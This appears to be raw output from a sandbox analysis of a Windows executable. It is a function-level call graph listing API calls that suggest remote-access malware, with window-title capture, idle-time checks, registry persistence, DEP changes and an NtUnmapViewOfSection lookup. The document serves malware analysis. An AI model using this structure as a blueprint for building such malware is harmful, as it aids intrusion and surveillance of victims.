53076->53077 53078 274c10f1 57 API calls 53077->53078 53079 274c1539 lstrlenW lstrcatW 53078->53079 53080 274c10f1 57 API calls 53079->53080 53081 274c156b lstrlenW lstrcatW 53080->53081 53082 274c10f1 57 API calls 53081->53082 53083 274c159d lstrlenW lstrcatW 53082->53083 53084 274c10f1 57 API calls 53083->53084 53084->53085 53085->53049 53087 274c1118 ___scrt_fastfail 53086->53087 53088 274c1129 lstrlenW 53087->53088 53099 274c2c40 53088->53099 53091 274c1168 lstrlenW 53092 274c1177 lstrlenW FindFirstFileW 53091->53092 53093 274c11a0 53092->53093 53094 274c11e1 53092->53094 53095 274c11aa 53093->53095 53096 274c11c7 FindNextFileW 53093->53096 53094->53065 53095->53096 53101 274c1000 57 API calls ___scrt_fastfail 53095->53101 53096->53093 53098 274c11da FindClose 53096->53098 53098->53094 53100 274c1148 lstrcatW lstrlenW 53099->53100 53100->53091 53100->53092 53101->53095 53135 41179c 53102->53135 53104 411d1c 53105 411d32 SetLastError 53104->53105 53106 41179c SetLastError 53104->53106 53114 411cfa 53104->53114 53105->53114 53107 411d4f 53106->53107 53107->53105 53109 411d71 GetNativeSystemInfo 53107->53109 53107->53114 53110 411db7 53109->53110 53111 411dc4 SetLastError 53110->53111 53138 411ca3 VirtualAlloc 53110->53138 53111->53114 53114->53053 53115 411de7 53116 411e0c GetProcessHeap HeapAlloc 53115->53116 53148 411ca3 VirtualAlloc 53115->53148 53117 411e23 53116->53117 53118 411e35 53116->53118 53149 411cba VirtualFree 53117->53149 53121 41179c SetLastError 53118->53121 53123 411e7e 53121->53123 53122 411dff 53122->53111 53122->53116 53124 411f30 53123->53124 53139 411ca3 VirtualAlloc 53123->53139 53150 412077 GetProcessHeap HeapFree 53124->53150 53127 411e97 ctype 53140 4117af SetLastError ctype ___scrt_get_show_window_mode 53127->53140 53129 411ec3 53129->53124 53141 411b5f 26 API calls 53129->53141 53131 411ef0 53131->53124 53142 41194f 53131->53142 53133 411efb 53133->53114 53133->53124 53134 411f25 SetLastError 53133->53134 53134->53124 53136 4117a0 
SetLastError 53135->53136 53137 4117ab 53135->53137 53136->53104 53137->53104 53138->53115 53139->53127 53140->53129 53141->53131 53146 411975 53142->53146 53143 411a5e 53144 4118b2 VirtualProtect 53143->53144 53145 411a70 53144->53145 53145->53133 53146->53143 53146->53145 53151 4118b2 53146->53151 53148->53122 53149->53111 53150->53114 53152 4118c3 53151->53152 53154 4118bb 53151->53154 53153 411936 VirtualProtect 53152->53153 53152->53154 53153->53154 53154->53146 53156 4041c8 53155->53156 53159 4041d9 53156->53159 53158 40419c 53158->52995 53160 4041e9 53159->53160 53161 404206 53160->53161 53162 4041ef 53160->53162 53163 4027e6 28 API calls 53161->53163 53166 404267 53162->53166 53165 404204 53163->53165 53165->53158 53167 402888 22 API calls 53166->53167 53168 40427b 53167->53168 53169 404290 53168->53169 53170 4042a5 53168->53170 53171 4042df 22 API calls 53169->53171 53172 4027e6 28 API calls 53170->53172 53173 404299 53171->53173 53175 4042a3 53172->53175 53174 402c48 22 API calls 53173->53174 53174->53175 53175->53165 53177 441e8d 53176->53177 53180 441c7d 53177->53180 53179 41bbb2 53179->53009 53181 441c94 53180->53181 53183 441ccb _strftime 53181->53183 53184 4405dd 20 API calls _abort 53181->53184 53183->53179 53184->53183 53185->53014 53186->52970 53187->52972 53188->52792 53190 4020f6 28 API calls 53189->53190 53191 415b0c SetEvent 53190->53191 53192 415b21 53191->53192 53193 4041a2 28 API calls 53192->53193 53194 415b3b 53193->53194 53195 4020f6 28 API calls 53194->53195 53196 415b4b 53195->53196 53197 4020f6 28 API calls 53196->53197 53198 415b5d 53197->53198 53199 41be1b 28 API calls 53198->53199 53200 415b66 53199->53200 53202 415b86 GetTickCount 53200->53202 53203 415ce5 53200->53203 53267 415cd6 53200->53267 53201 401e8d 11 API calls 53205 417092 53201->53205 53204 41bb8e 28 API calls 53202->53204 53265 415cf9 53203->53265 53203->53267 53206 415b97 53204->53206 53208 401fd8 11 API calls 53205->53208 53268 41bae6 GetLastInputInfo GetTickCount 
53206->53268 53210 41709e 53208->53210 53212 401fd8 11 API calls 53210->53212 53211 415ba3 53213 41bb8e 28 API calls 53211->53213 53214 4170aa 53212->53214 53215 415bae 53213->53215 53269 41ba96 53215->53269 53218 41bd1e 28 API calls 53219 415bca 53218->53219 53220 401e65 22 API calls 53219->53220 53221 415bd8 53220->53221 53222 402f31 28 API calls 53221->53222 53223 415be6 53222->53223 53224 402ea1 28 API calls 53223->53224 53225 415bf5 53224->53225 53226 402f10 28 API calls 53225->53226 53227 415c04 53226->53227 53228 402ea1 28 API calls 53227->53228 53229 415c13 53228->53229 53230 402f10 28 API calls 53229->53230 53231 415c1f 53230->53231 53232 402ea1 28 API calls 53231->53232 53233 415c29 53232->53233 53234 404aa1 61 API calls 53233->53234 53235 415c38 53234->53235 53236 401fd8 11 API calls 53235->53236 53237 415c41 53236->53237 53238 401fd8 11 API calls 53237->53238 53239 415c4d 53238->53239 53240 401fd8 11 API calls 53239->53240 53241 415c59 53240->53241 53242 401fd8 11 API calls 53241->53242 53243 415c65 53242->53243 53244 401fd8 11 API calls 53243->53244 53245 415c71 53244->53245 53246 401fd8 11 API calls 53245->53246 53247 415c7d 53246->53247 53248 401f09 11 API calls 53247->53248 53249 415c86 53248->53249 53250 401fd8 11 API calls 53249->53250 53251 415c8f 53250->53251 53252 401fd8 11 API calls 53251->53252 53253 415c98 53252->53253 53254 401e65 22 API calls 53253->53254 53255 415ca3 53254->53255 53274 43baac 53255->53274 53258 415cb5 53261 415cc3 53258->53261 53262 415cce 53258->53262 53259 415cdb 53260 401e65 22 API calls 53259->53260 53260->53203 53278 404ff4 82 API calls 53261->53278 53279 404f51 53262->53279 53294 4050e4 84 API calls 53265->53294 53266 415cc9 53266->53267 53267->53201 53268->53211 53295 436e90 53269->53295 53272 40417e 28 API calls 53273 415bbc 53272->53273 53273->53218 53275 43bac5 _swprintf 53274->53275 53297 43ae03 53275->53297 53277 415cb0 53277->53258 53277->53259 53278->53266 53280 404fea 53279->53280 53281 404f65 53279->53281 
53280->53267 53282 404f6e 53281->53282 53283 404fc0 CreateEventA CreateThread 53281->53283 53284 404f7d GetLocalTime 53281->53284 53282->53283 53283->53280 53326 405150 53283->53326 53285 41bb8e 28 API calls 53284->53285 53286 404f91 53285->53286 53325 4052fd 28 API calls 53286->53325 53294->53266 53296 41bab5 GetForegroundWindow GetWindowTextW 53295->53296 53296->53272 53313 43ba0a 53297->53313 53299 43ae50 53319 43a7b7 36 API calls 2 library calls 53299->53319 53300 43ae15 53300->53299 53301 43ae2a 53300->53301 53304 43ae2f _strftime 53300->53304 53318 4405dd 20 API calls _abort 53301->53318 53304->53277 53306 43ae5c 53307 43ae8b 53306->53307 53320 43ba4f 40 API calls __Toupper 53306->53320 53309 43aef7 53307->53309 53321 43b9b6 20 API calls 2 library calls 53307->53321 53322 43b9b6 20 API calls 2 library calls 53309->53322 53311 43afbe _swprintf 53311->53304 53323 4405dd 20 API calls _abort 53311->53323 53314 43ba22 53313->53314 53315 43ba0f 53313->53315 53314->53300 53324 4405dd 20 API calls _abort 53315->53324 53317 43ba14 _strftime 53317->53300 53318->53304 53319->53306 53320->53306 53321->53309 53322->53311 53323->53304 53324->53317 53329 40515c 102 API calls 53326->53329 53328 405159 53329->53328 53330->52735 53331->52740 53332->52742 53333 434887 53334 434893 ___DestructExceptionObject 53333->53334 53360 434596 53334->53360 53337 43489a 53338 4348c3 53337->53338 53658 4349f9 IsProcessorFeaturePresent IsDebuggerPresent SetUnhandledExceptionFilter UnhandledExceptionFilter ___scrt_get_show_window_mode 53337->53658 53346 434902 ___scrt_is_nonwritable_in_current_image ___scrt_release_startup_lock 53338->53346 53659 444251 5 API calls __ehhandler$??2@YAPAXIABUnothrow_t@std@@@Z 53338->53659 53340 4348dc 53342 4348e2 ___DestructExceptionObject 53340->53342 53660 4441f5 5 API calls __ehhandler$??2@YAPAXIABUnothrow_t@std@@@Z 53340->53660 53343 434962 53371 434b14 53343->53371 53346->53343 53661 4433e7 36 API calls 6 library calls 53346->53661 53353 434984 53354 
43498e 53353->53354 53663 44341f 28 API calls _abort 53353->53663 53356 434997 53354->53356 53664 4433c2 28 API calls _abort 53354->53664 53665 43470d 13 API calls 2 library calls 53356->53665 53359 43499f 53359->53342 53361 43459f 53360->53361 53666 434c52 IsProcessorFeaturePresent 53361->53666 53363 4345ab 53667 438f31 10 API calls 4 library calls 53363->53667 53365 4345b0 53366 4345b4 53365->53366 53668 4440bf IsProcessorFeaturePresent SetUnhandledExceptionFilter UnhandledExceptionFilter GetCurrentProcess TerminateProcess 53365->53668 53366->53337 53368 4345bd 53369 4345cb 53368->53369 53669 438f5a 8 API calls 3 library calls 53368->53669 53369->53337 53372 436e90 ___scrt_get_show_window_mode 53371->53372 53373 434b27 GetStartupInfoW 53372->53373 53374 434968 53373->53374 53375 4441a2 53374->53375 53670 44f059 53375->53670 53377 434971 53380 40e9c5 53377->53380 53378 4441ab 53378->53377 53674 446815 36 API calls 53378->53674 53676 41cb50 LoadLibraryA GetProcAddress 53380->53676 53382 40e9e1 GetModuleFileNameW 53681 40f3c3 53382->53681 53384 40e9fd 53385 4020f6 28 API calls 53384->53385 53386 40ea0c 53385->53386 53387 4020f6 28 API calls 53386->53387 53388 40ea1b 53387->53388 53389 41be1b 28 API calls 53388->53389 53390 40ea24 53389->53390 53696 40fb17 53390->53696 53392 40ea2d 53393 401e8d 11 API calls 53392->53393 53394 40ea36 53393->53394 53395 40ea93 53394->53395 53396 40ea49 53394->53396 53397 401e65 22 API calls 53395->53397 53890 40fbb3 97 API calls 53396->53890 53399 40eaa3 53397->53399 53403 401e65 22 API calls 53399->53403 53400 40ea5b 53401 401e65 22 API calls 53400->53401 53402 40ea67 53401->53402 53891 410f37 36 API calls __EH_prolog 53402->53891 53404 40eac2 53403->53404 53405 40531e 28 API calls 53404->53405 53407 40ead1 53405->53407 53409 406383 28 API calls 53407->53409 53408 40ea79 53892 40fb64 78 API calls 53408->53892 53412 40eadd 53409->53412 53411 40ea82 53893 40f3b0 71 API calls 53411->53893 53414 401fe2 28 API calls 53412->53414 53415 
40eae9 53414->53415 53416 401fd8 11 API calls 53415->53416 53417 40eaf2 53416->53417 53419 401fd8 11 API calls 53417->53419 53418 401fd8 11 API calls 53420 40eefb 53418->53420 53421 40eafb 53419->53421 53662 4432f6 GetModuleHandleW 53420->53662 53422 401e65 22 API calls 53421->53422 53423 40eb04 53422->53423 53424 401fc0 28 API calls 53423->53424 53425 40eb0f 53424->53425 53426 401e65 22 API calls 53425->53426 53427 40eb28 53426->53427 53428 401e65 22 API calls 53427->53428 53429 40eb43 53428->53429 53430 40ebae 53429->53430 53894 406c1e 53429->53894 53432 401e65 22 API calls 53430->53432 53437 40ebbb 53432->53437 53433 40eb70 53434 401fe2 28 API calls 53433->53434 53435 40eb7c 53434->53435 53438 401fd8 11 API calls 53435->53438 53436 40ec02 53700 40d069 53436->53700 53437->53436 53442 413549 3 API calls 53437->53442 53439 40eb85 53438->53439 53899 413549 RegOpenKeyExA 53439->53899 53441 40ec08 53443 40ea8b 53441->53443 53703 41b2c3 53441->53703 53449 40ebe6 53442->53449 53443->53418 53447 40ec23 53450 40ec76 53447->53450 53720 407716 53447->53720 53448 40f34f 53992 4139a9 30 API calls 53448->53992 53449->53436 53902 4139a9 30 API calls 53449->53902 53453 401e65 22 API calls 53450->53453 53456 40ec7f 53453->53456 53455 40f365 53993 412475 65 API calls ___scrt_get_show_window_mode 53455->53993 53465 40ec90 53456->53465 53466 40ec8b 53456->53466 53459 40ec42 53903 407738 30 API calls 53459->53903 53460 40ec4c 53461 401e65 22 API calls 53460->53461 53474 40ec55 53461->53474 53462 40f36f 53464 41bc5e 28 API calls 53462->53464 53471 40f37f 53464->53471 53470 401e65 22 API calls 53465->53470 53906 407755 CreateProcessA CloseHandle CloseHandle ___scrt_get_show_window_mode 53466->53906 53467 40ec47 53904 407260 98 API calls 53467->53904 53472 40ec99 53470->53472 53792 413a23 RegOpenKeyExW 53471->53792 53724 41bc5e 53472->53724 53474->53450 53478 40ec71 53474->53478 53475 40eca4 53728 401f13 53475->53728 53905 407260 98 API calls 53478->53905 53482 401f09 11 API calls 53484 
40f39c 53482->53484 53483 401f09 11 API calls 53485 40ecb8 53483->53485 53486 401f09 11 API calls 53484->53486 53487 401e65 22 API calls 53485->53487 53488 40f3a5 53486->53488 53489 40ecc1 53487->53489 53795 40dd42 53488->53795 53494 401e65 22 API calls 53489->53494 53493 40f3af 53495 40ecdb 53494->53495 53496 401e65 22 API calls 53495->53496 53497 40ecf5 53496->53497 53498 401e65 22 API calls 53497->53498 53499 40ed0e 53498->53499 53501 401e65 22 API calls 53499->53501 53531 40ed7b 53499->53531 53500 40ed8a 53502 40ed93 53500->53502 53518 40ee0f ___scrt_get_show_window_mode 53500->53518 53505 40ed23 _wcslen 53501->53505 53503 401e65 22 API calls 53502->53503 53504 40ed9c 53503->53504 53506 401e65 22 API calls 53504->53506 53508 401e65 22 API calls 53505->53508 53505->53531 53509 40edae 53506->53509 53507 40ef06 ___scrt_get_show_window_mode 53967 4136f8 RegOpenKeyExA 53507->53967 53510 40ed3e 53508->53510 53512 401e65 22 API calls 53509->53512 53513 401e65 22 API calls 53510->53513 53514 40edc0 53512->53514 53515 40ed53 53513->53515 53519 401e65 22 API calls 53514->53519 53907 40da34 53515->53907 53516 40ef51 53517 401e65 22 API calls 53516->53517 53521 40ef76 53517->53521 53737 413947 53518->53737 53520 40ede9 53519->53520 53525 401e65 22 API calls 53520->53525 53526 402093 28 API calls 53521->53526 53524 401f13 28 API calls 53527 40ed72 53524->53527 53528 40edfa 53525->53528 53529 40ef88 53526->53529 53530 401f09 11 API calls 53527->53530 53965 40cdf9 46 API calls _wcslen 53528->53965 53747 41376f RegCreateKeyA 53529->53747 53530->53531 53531->53500 53531->53507 53535 40eea3 ctype 53540 401e65 22 API calls 53535->53540 53536 40ee0a 53536->53518 53538 401e65 22 API calls 53539 40efaa 53538->53539 53542 43baac 40 API calls 53539->53542 53541 40eeba 53540->53541 53541->53516 53545 40eece 53541->53545 53543 40efb7 53542->53543 53544 40efc1 53543->53544 53546 40efe4 53543->53546 53970 41cd9b 88 API calls ___scrt_get_show_window_mode 53544->53970 53547 401e65 22 API 
calls 53545->53547 53551 402093 28 API calls 53546->53551 53549 40eed7 53547->53549 53552 41bc5e 28 API calls 53549->53552 53550 40efc8 CreateThread 53550->53546 54452 41d45d 10 API calls 53550->54452 53553 40eff9 53551->53553 53554 40eee3 53552->53554 53555 402093 28 API calls 53553->53555 53966 40f474 114 API calls 53554->53966 53557 40f008 53555->53557 53560 41b4ef 80 API calls 53557->53560 53558 40eee8 53558->53516 53559 40eeef 53558->53559 53559->53443 53561 40f00d 53560->53561 53562 401e65 22 API calls 53561->53562 53563 40f019 53562->53563 53564 401e65 22 API calls 53563->53564 53565 40f02b 53564->53565 53566 401e65 22 API calls 53565->53566 53567 40f04b 53566->53567 53568 43baac 40 API calls 53567->53568 53569 40f058 53568->53569 53570 401e65 22 API calls 53569->53570 53571 40f063 53570->53571 53572 401e65 22 API calls 53571->53572 53573 40f074 53572->53573 53574 401e65 22 API calls 53573->53574 53575 40f089 53574->53575 53576 401e65 22 API calls 53575->53576 53577 40f09a 53576->53577 53578 40f0a1 StrToIntA 53577->53578 53753 409de4 53578->53753 53581 401e65 22 API calls 53582 40f0bc 53581->53582 53583 40f101 53582->53583 53584 40f0c8 53582->53584 53587 401e65 22 API calls 53583->53587 53971 4344ea 53584->53971 53589 40f111 53587->53589 53588 401e65 22 API calls 53590 40f0e4 53588->53590 53591 40f159 53589->53591 53592 40f11d 53589->53592 53593 40f0eb CreateThread 53590->53593 53595 401e65 22 API calls 53591->53595 53594 4344ea new 22 API calls 53592->53594 53593->53583 54451 419fb4 110 API calls __EH_prolog 53593->54451 53596 40f126 53594->53596 53597 40f162 53595->53597 53598 401e65 22 API calls 53596->53598 53600 40f1cc 53597->53600 53601 40f16e 53597->53601 53599 40f138 53598->53599 53602 40f13f CreateThread 53599->53602 53603 401e65 22 API calls 53600->53603 53604 401e65 22 API calls 53601->53604 53602->53591 54450 419fb4 110 API calls __EH_prolog 53602->54450 53606 40f1d5 53603->53606 53605 40f17e 53604->53605 53609 401e65 22 API calls 53605->53609 
53607 40f1e1 53606->53607 53608 40f21a 53606->53608 53610 401e65 22 API calls 53607->53610 53778 41b60d GetComputerNameExW GetUserNameW 53608->53778 53611 40f193 53609->53611 53614 40f1ea 53610->53614 53978 40d9e8 53611->53978 53619 401e65 22 API calls 53614->53619 53615 401f13 28 API calls 53616 40f22e 53615->53616 53618 401f09 11 API calls 53616->53618 53621 40f237 53618->53621 53622 40f1ff 53619->53622 53624 40f240 SetProcessDEPPolicy 53621->53624 53625 40f243 CreateThread 53621->53625 53632 43baac 40 API calls 53622->53632 53623 401f13 28 API calls 53626 40f1b2 53623->53626 53624->53625 53627 40f264 53625->53627 53628 40f258 CreateThread 53625->53628 54422 40f7a7 53625->54422 53629 401f09 11 API calls 53626->53629 53630 40f279 53627->53630 53631 40f26d CreateThread 53627->53631 53628->53627 53633 40f1bb CreateThread 53629->53633 53635 40f2cc 53630->53635 53637 402093 28 API calls 53630->53637 53631->53630 54453 4126db 38 API calls ___scrt_get_show_window_mode 53631->54453 53634 40f20c 53632->53634 53633->53600 54449 401be9 50 API calls 53633->54449 53989 40c162 7 API calls 53634->53989 53789 4134ff RegOpenKeyExA 53635->53789 53638 40f29c 53637->53638 53990 4052fd 28 API calls 53638->53990 53644 40f2ed 53646 41bc5e 28 API calls 53644->53646 53648 40f2fd 53646->53648 53991 41361b 31 API calls 53648->53991 53652 40f313 53653 401f09 11 API calls 53652->53653 53656 40f31e 53653->53656 53654 40f346 DeleteFileW 53655 40f34d 53654->53655 53654->53656 53655->53462 53656->53462 53656->53654 53657 40f334 Sleep 53656->53657 53657->53656 53658->53337 53659->53340 53660->53346 53661->53343 53662->53353 53663->53354 53664->53356 53665->53359 53666->53363 53667->53365 53668->53368 53669->53366 53671 44f06b 53670->53671 53672 44f062 53670->53672 53671->53378 53675 44ef58 49 API calls 5 library calls 53672->53675 53674->53378 53675->53671 53677 41cb8f LoadLibraryA GetProcAddress 53676->53677 53678 41cb7f GetModuleHandleA GetProcAddress 53676->53678 53679 41cbb8 44 API calls 
53677->53679 53680 41cba8 LoadLibraryA GetProcAddress 53677->53680 53678->53677 53679->53382 53680->53679 53994 41b4a8 FindResourceA 53681->53994 53684 43bd51 new 21 API calls 53685 40f3ed ctype 53684->53685 53686 4020b7 28 API calls 53685->53686 53687 40f408 53686->53687 53688 401fe2 28 API calls 53687->53688 53689 40f413 53688->53689 53690 401fd8 11 API calls 53689->53690 53691 40f41c 53690->53691 53692 43bd51 new 21 API calls 53691->53692 53693 40f42d ctype 53692->53693 53997 406dd8 53693->53997 53695 40f460 53695->53384 53697 40fb23 53696->53697 53699 40fb2a 53696->53699 54000 402163 11 API calls 53697->54000 53699->53392 54001 401fab 53700->54001 53702 40d073 CreateMutexA GetLastError 53702->53441 54002 41bfb7 53703->54002 53708 401fe2 28 API calls 53709 41b2ff 53708->53709 53710 401fd8 11 API calls 53709->53710 53712 41b307 53710->53712 53711 41b35d 53711->53447 53712->53711 53713 4135a6 31 API calls 53712->53713 53714 41b330 53713->53714 53715 41b33b StrToIntA 53714->53715 53716 41b352 53715->53716 53717 41b349 53715->53717 53718 401fd8 11 API calls 53716->53718 54011 41cf69 22 API calls 53717->54011 53718->53711 53721 40772a 53720->53721 53722 413549 3 API calls 53721->53722 53723 407731 53722->53723 53723->53459 53723->53460 53725 41bc72 53724->53725 53726 40b904 28 API calls 53725->53726 53727 41bc7a 53726->53727 53727->53475 53729 401f22 53728->53729 53730 401f6a 53728->53730 53731 402252 11 API calls 53729->53731 53730->53483 53732 401f2b 53731->53732 53733 401f6d 53732->53733 53734 401f46 53732->53734 54013 402336 53733->54013 54012 40305c 28 API calls 53734->54012 53738 413965 53737->53738 53739 406dd8 28 API calls 53738->53739 53740 41397a 53739->53740 53741 4020f6 28 API calls 53740->53741 53742 41398a 53741->53742 53743 41376f 14 API calls 53742->53743 53744 413994 53743->53744 53745 401fd8 11 API calls 53744->53745 53746 4139a1 53745->53746 53746->53535 53748 413788 53747->53748 53749 4137bf 53747->53749 53752 41379a RegSetValueExA RegCloseKey 
53748->53752 53750 401fd8 11 API calls 53749->53750 53751 40ef9e 53750->53751 53751->53538 53752->53749 53754 409e02 _wcslen 53753->53754 53755 409e24 53754->53755 53756 409e0d 53754->53756 53758 40da34 32 API calls 53755->53758 53757 40da34 32 API calls 53756->53757 53760 409e15 53757->53760 53759 409e2c 53758->53759 53761 401f13 28 API calls 53759->53761 53762 401f13 28 API calls 53760->53762 53763 409e3a 53761->53763 53777 409e1f 53762->53777 53764 401f09 11 API calls 53763->53764 53765 409e42 53764->53765 54032 40915b 28 API calls 53765->54032 53766 401f09 11 API calls 53768 409e79 53766->53768 54017 40a109 53768->54017 53770 409e54 54033 403014 53770->54033 53774 401f13 28 API calls 53775 409e69 53774->53775 53776 401f09 11 API calls 53775->53776 53776->53777 53777->53766 53779 40417e 28 API calls 53778->53779 53780 41b65c 53779->53780 54232 4042fc 53780->54232 53783 403014 28 API calls 53784 41b672 53783->53784 53785 401f09 11 API calls 53784->53785 53786 41b67b 53785->53786 53787 401f09 11 API calls 53786->53787 53788 40f223 53787->53788 53788->53615 53790 413520 RegQueryValueExA RegCloseKey 53789->53790 53791 40f2e4 53789->53791 53790->53791 53791->53488 53791->53644 53793 40f392 53792->53793 53794 413a3f RegDeleteValueW 53792->53794 53793->53482 53794->53793 53796 40dd5b 53795->53796 53797 4134ff 3 API calls 53796->53797 53798 40dd62 53797->53798 53799 40dd81 53798->53799 54307 401707 53798->54307 53803 414f2a 53799->53803 53801 40dd6f 54310 413877 RegCreateKeyA 53801->54310 53804 4020df 11 API calls 53803->53804 53805 414f3e 53804->53805 54324 41b8b3 53805->54324 53808 4020df 11 API calls 53809 414f54 53808->53809 53810 401e65 22 API calls 53809->53810 53811 414f62 53810->53811 53812 43baac 40 API calls 53811->53812 53813 414f6f 53812->53813 53814 414f81 53813->53814 53815 414f74 Sleep 53813->53815 53816 402093 28 API calls 53814->53816 53815->53814 53817 414f90 53816->53817 53818 401e65 22 API calls 53817->53818 53819 414f99 53818->53819 53820 4020f6 28 
API calls 53819->53820 53821 414fa4 53820->53821 53822 41be1b 28 API calls 53821->53822 53823 414fac 53822->53823 54328 40489e WSAStartup 53823->54328 53825 414fb6 53826 401e65 22 API calls 53825->53826 53827 414fbf 53826->53827 53828 401e65 22 API calls 53827->53828 53853 41503e 53827->53853 53829 414fd8 53828->53829 53830 401e65 22 API calls 53829->53830 53831 414fe9 53830->53831 53833 401e65 22 API calls 53831->53833 53832 41be1b 28 API calls 53832->53853 53834 414ffa 53833->53834 53836 401e65 22 API calls 53834->53836 53835 406c1e 28 API calls 53835->53853 53837 41500b 53836->53837 53839 401e65 22 API calls 53837->53839 53838 401fe2 28 API calls 53838->53853 53840 41501c 53839->53840 53841 401e65 22 API calls 53840->53841 53842 41502e 53841->53842 54354 40473d 89 API calls 53842->54354 53844 406383 28 API calls 53844->53853 53845 401e65 22 API calls 53845->53853 53847 41518c WSAGetLastError 54355 41cae1 30 API calls 53847->54355 53848 40482d 3 API calls 53848->53853 53851 404f51 105 API calls 53851->53853 53852 402093 28 API calls 53852->53853 53853->53832 53853->53835 53853->53838 53853->53844 53853->53845 53853->53847 53853->53848 53853->53851 53853->53852 53854 4048c8 97 API calls 53853->53854 53855 404e26 99 API calls 53853->53855 53856 40531e 28 API calls 53853->53856 53858 401e8d 11 API calls 53853->53858 53859 415a33 53853->53859 53862 41b4ef 80 API calls 53853->53862 53865 40905c 28 API calls 53853->53865 53866 441e81 20 API calls 53853->53866 53867 4020f6 28 API calls 53853->53867 53868 4136f8 3 API calls 53853->53868 53869 4135a6 31 API calls 53853->53869 53870 40417e 28 API calls 53853->53870 53873 41bb8e 28 API calls 53853->53873 53874 401e65 22 API calls 53853->53874 53878 41ba96 30 API calls 53853->53878 53879 41bd1e 28 API calls 53853->53879 53881 402f31 28 API calls 53853->53881 53882 402f10 28 API calls 53853->53882 53883 402ea1 28 API calls 53853->53883 53884 404aa1 61 API calls 53853->53884 53885 401fd8 11 API calls 53853->53885 53886 404c10 
265 API calls 53853->53886 53888 415a71 CreateThread 53853->53888 53889 401f09 11 API calls 53853->53889 54329 414ee9 53853->54329 54335 41b7e0 53853->54335 54338 4145bd 53853->54338 54341 40dd89 53853->54341 54347 41bc42 53853->54347 54350 41bae6 GetLastInputInfo GetTickCount 53853->54350 54351 40f8d1 GetLocaleInfoA 53853->54351 54356 4052fd 28 API calls 53853->54356 53854->53853 53855->53853 53856->53853 53857 401e65 22 API calls 53857->53859 53858->53853 53859->53857 53860 43baac 40 API calls 53859->53860 54357 40b051 85 API calls 53859->54357 53861 415acf Sleep 53860->53861 53861->53853 53862->53853 53865->53853 53866->53853 53867->53853 53868->53853 53869->53853 53870->53853 53873->53853 53875 415439 GetTickCount 53874->53875 53876 41bb8e 28 API calls 53875->53876 53876->53853 53878->53853 53879->53853 53881->53853 53882->53853 53883->53853 53884->53853 53885->53853 53886->53853 53888->53853 54398 41ad17 106 API calls 53888->54398 53889->53853 53890->53400 53891->53408 53892->53411 53895 4020df 11 API calls 53894->53895 53896 406c2a 53895->53896 53897 4032a0 28 API calls 53896->53897 53898 406c47 53897->53898 53898->53433 53900 40eba4 53899->53900 53901 413573 RegQueryValueExA RegCloseKey 53899->53901 53900->53430 53900->53448 53901->53900 53902->53436 53903->53467 53904->53460 53905->53450 53906->53465 53908 401f86 11 API calls 53907->53908 53909 40da50 53908->53909 53910 40da70 53909->53910 53911 40daa5 53909->53911 53912 40da66 53909->53912 54414 41b5b4 29 API calls 53910->54414 53915 41bfb7 2 API calls 53911->53915 53914 40db99 GetLongPathNameW 53912->53914 53918 40417e 28 API calls 53914->53918 53916 40daaa 53915->53916 53919 40db00 53916->53919 53920 40daae 53916->53920 53917 40da79 53921 401f13 28 API calls 53917->53921 53922 40dbae 53918->53922 53923 40417e 28 API calls 53919->53923 53924 40417e 28 API calls 53920->53924 53925 40da83 53921->53925 53926 40417e 28 API calls 53922->53926 53928 40db0e 53923->53928 53929 40dabc 53924->53929 53931 401f09 11 
API calls 53925->53931 53927 40dbbd 53926->53927 54399 40ddd1 53927->54399 53934 40417e 28 API calls 53928->53934 53935 40417e 28 API calls 53929->53935 53931->53912 53937 40db24 53934->53937 53938 40dad2 53935->53938 53940 402fa5 28 API calls 53937->53940 53941 402fa5 28 API calls 53938->53941 53939 402fa5 28 API calls 53942 40dbe5 53939->53942 53943 40db2f 53940->53943 53944 40dadd 53941->53944 53945 401f09 11 API calls 53942->53945 53946 401f13 28 API calls 53943->53946 53947 401f13 28 API calls 53944->53947 53948 40dbef 53945->53948 53949 40db3a 53946->53949 53950 40dae8 53947->53950 53951 401f09 11 API calls 53948->53951 53952 401f09 11 API calls 53949->53952 53953 401f09 11 API calls 53950->53953 53954 40dbf8 53951->53954 53955 40db43 53952->53955 53956 40daf1 53953->53956 53957 401f09 11 API calls 53954->53957 53958 401f09 11 API calls 53955->53958 53959 401f09 11 API calls 53956->53959 53960 40dc01 53957->53960 53958->53925 53959->53925 53961 401f09 11 API calls 53960->53961 53962 40dc0a 53961->53962 53963 401f09 11 API calls 53962->53963 53964 40dc13 53963->53964 53964->53524 53965->53536 53966->53558 53968 41371e RegQueryValueExA RegCloseKey 53967->53968 53969 413742 53967->53969 53968->53969 53969->53516 53970->53550 53973 4344ef 53971->53973 53972 43bd51 new 21 API calls 53972->53973 53973->53972 53974 40f0d1 53973->53974 54419 442f80 7 API calls 2 library calls 53973->54419 54420 434c35 RaiseException Concurrency::cancel_current_task __CxxThrowException@8 53973->54420 54421 43526e RaiseException Concurrency::cancel_current_task __CxxThrowException@8 53973->54421 53974->53588 53979 402093 28 API calls 53978->53979 53980 40d9ff 53979->53980 53981 41bc5e 28 API calls 53980->53981 53982 40da0a 53981->53982 53983 40da34 32 API calls 53982->53983 53984 40da1b 53983->53984 53985 401f09 11 API calls 53984->53985 53986 40da24 53985->53986 53987 401fd8 11 API calls 53986->53987 53988 40da2c 53987->53988 53988->53623 53989->53608 53991->53652 53992->53455 53995 

Control-flow Graph

APIs
  • Part of subcall function 0041CB50: LoadLibraryA.KERNEL32(Psapi,GetProcessImageFileNameW,?,?,?,?,0040E9E1), ref: 0041CB65
  • Part of subcall function 0041CB50: GetProcAddress.KERNEL32(00000000), ref: 0041CB6E
  • Part of subcall function 0041CB50: GetModuleHandleA.KERNEL32(Kernel32,GetProcessImageFileNameW,?,?,?,?,0040E9E1), ref: 0041CB85
  • Part of subcall function 0041CB50: GetProcAddress.KERNEL32(00000000), ref: 0041CB88
  • Part of subcall function 0041CB50: LoadLibraryA.KERNEL32(shcore,SetProcessDpiAwareness,?,?,?,?,0040E9E1), ref: 0041CB9A
  • Part of subcall function 0041CB50: GetProcAddress.KERNEL32(00000000), ref: 0041CB9D
  • Part of subcall function 0041CB50: LoadLibraryA.KERNEL32(user32,SetProcessDpiAwareness,?,?,?,?,0040E9E1), ref: 0041CBAE
  • Part of subcall function 0041CB50: GetProcAddress.KERNEL32(00000000), ref: 0041CBB1
  • Part of subcall function 0041CB50: LoadLibraryA.KERNEL32(ntdll,NtUnmapViewOfSection,?,?,?,?,0040E9E1), ref: 0041CBC3
  • Part of subcall function 0041CB50: GetProcAddress.KERNEL32(00000000), ref: 0041CBC6
